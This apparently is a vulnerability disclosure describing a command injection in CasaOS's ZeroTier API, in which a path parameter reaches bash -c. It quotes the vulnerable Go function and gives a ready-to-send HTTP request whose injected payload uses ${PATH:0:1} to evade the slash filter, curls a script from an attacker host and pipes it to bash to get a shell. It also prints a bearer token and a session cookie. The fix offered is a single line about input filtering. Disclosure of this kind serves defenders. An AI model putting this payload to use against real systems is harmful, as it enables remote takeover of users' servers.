description
A command injection in CasaOS last version which will lead to getshell and affect all version.
analysis
For CasaOS system, it provides an api to control zerotier’s network information by pass id of zerotier in path.
in ZeroTiger’s service, we find it use command2.OnlyExec to execute command and id will be jointed with command together.
we find OnlyExec work like this, which allow execute cmdStr as os command directly.
1
2
3
4
5
6
7
8
9
10
11
12
13func OnlyExec(cmdStr string) {
cmd := exec.Command("/bin/bash", "-c", cmdStr)
stdout, err := cmd.StdoutPipe()
if err != nil {
return
}
defer stdout.Close()
if err := cmd.Start(); err != nil {
return
}
cmd.Wait()
return
}
exploit
firstly we need login in dashboard,because we need the token of an user.
Modify an network package by burpsuit and change the api to /v1/zerotier/leave/xxx.In this case, no slash is allowed in path, so we use ${PATH:0:1} replace slash in command injection.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18POST /v1/zerotier/leave/1||curl%20http:${PATH:0:1}${PATH:0:1}youvpsip${PATH:0:1}1.txt|bash HTTP/1.1
Host: api.localhost.casaos.zimaboard.com:8089
Accept: application/json, text/plain, */*
DNT: 1
Language: en
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJ6aW1hYm9hcmQiLCJleHAiOjMzMTY3MDA3NzE5LCJpc3MiOiJnaW4tYmxvZyJ9.eExCLxt8k6ATdaaYrFUVY-c6y_Itmn3U-xGQXodqiUM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36
Referer: http://api.localhost.casaos.zimaboard.com:8089/ui/
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,ja;q=0.7
Cookie: pma_lang=en; phpMyAdmin=b9q9oik4hdj17b3a1aoijvae4k
x-forwarded-for: 127.0.0.1
x-originating-ip: 127.0.0.1
x-remote-ip: 127.0.0.1
x-remote-addr: 127.0.0.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0Finally we get the shell.
patch
- filter input, when you want to put input in an os command.